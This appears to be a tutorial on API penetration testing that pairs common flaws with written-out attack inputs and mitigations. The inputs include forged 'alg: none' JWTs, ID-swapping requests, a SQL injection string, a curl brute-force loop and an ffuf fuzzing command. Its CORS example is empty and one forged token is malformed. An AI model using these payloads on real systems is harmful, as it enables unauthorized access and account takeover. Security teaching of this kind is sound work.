API Penetration Testing: Common Vulnerabilities & Exploits
Comprehensive guide to identifying and exploiting vulnerabilities in API endpoints
Introduction to API Penetration Testing
APIs (Application Programming Interfaces) are critical components of modern applications, enabling communication between services. However, their exposure makes them prime targets for attackers. API penetration testing involves identifying and exploiting vulnerabilities to ensure robust security.
Common API Vulnerabilities
1. Broken Authentication
Weak authentication mechanisms allow attackers to impersonate users or gain unauthorized access.
Vulnerability | Example | Risk |
---|---|---|
Weak JWT Validation | alg: none in JWT header |
Unauthorized access |
Predictable Tokens | user_id=123 |
Account takeover |
Credential Stuffing | Brute-forcing API endpoints | Mass account compromise |
# Original JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJ1c2VyIn0.signature
# Modified JWT (change role to admin)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJhZG1pbiJ0.signature
# Bypassing signature validation
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJhZG1pbiJ0.
2. Broken Object Level Authorization (BOLA)
BOLA occurs when an API fails to verify user permissions, allowing access to unauthorized resources.
# Request to access another user's data
GET /api/users/456 HTTP/1.1
Host: vulnerable-api.com
Authorization: Bearer user_token_123
# Response (should be forbidden but returns data)
{
"id": 456,
"email": "victim@example.com",
"sensitive_data": "credit_card_info"
}
3. Excessive Data Exposure
APIs may return more data than necessary, exposing sensitive information.
# Request
GET /api/users/123 HTTP/1.1
Host: vulnerable-api.com
# Response (includes sensitive fields)
{
"id": 123,
"name": "John Doe",
"email": "john@example.com",
"password_hash": "hashed_password",
"ssn": "123-45-6789"
}
4. Injection Attacks
APIs that process user input without validation are vulnerable to injection attacks like SQL, NoSQL, or command injection.
# Malicious request
POST /api/search HTTP/1.1
Host: vulnerable-api.com
Content-Type: application/json
{
"query": "1' OR '1'='1"
}
# Response (dumps entire database)
{
"results": [
{"id": 1, "username": "admin", ...},
{"id": 2, "username": "user", ...}
]
}
5. Improper Rate Limiting
Lack of rate limiting allows attackers to brute-force endpoints or cause denial-of-service (DoS).
# Script to brute-force login
for password in $(cat passwords.txt); do
curl -X POST https://vulnerable-api.com/api/login \
-d "{\"username\":\"admin\",\"password\":\"$password\"}"
done
Exploitation Techniques
1. Fuzzing API Endpoints
Fuzzing involves sending unexpected inputs to discover hidden endpoints or vulnerabilities.
ffuf -w wordlist.txt -u https://vulnerable-api.com/api/FUZZ -H "Authorization: Bearer token"
# Common findings: /admin, /debug, /metrics
2. Parameter Tampering
Manipulating query parameters or request bodies to bypass restrictions.
# Original request
GET /api/orders?user_id=123 HTTP/1.1
Host: vulnerable-api.com
# Tampered request
GET /api/orders?user_id=456 HTTP/1.1
Host: vulnerable-api.com
3. Exploiting Misconfigured CORS
Misconfigured Cross-Origin Resource Sharing (CORS) can allow unauthorized domains to access API resources.
# Malicious HTML
Mitigation Techniques
For Developers:
- Implement strong authentication (e.g., OAuth 2.0, JWT with proper validation)
- Enforce object-level authorization checks
- Filter and sanitize all inputs to prevent injection
- Use rate limiting and throttling
- Return only necessary data in responses
- Configure CORS securely
- Regularly audit API endpoints with tools like OWASP ZAP or Burp Suite
For Pentesters:
Test all API endpoints, including undocumented ones. Pay attention to authentication, authorization, and input validation. Use tools like Postman, Burp Suite, or custom scripts for thorough testing.
Conclusion
API penetration testing is critical for securing modern applications. By understanding common vulnerabilities and exploitation techniques, developers and pentesters can build and test robust APIs.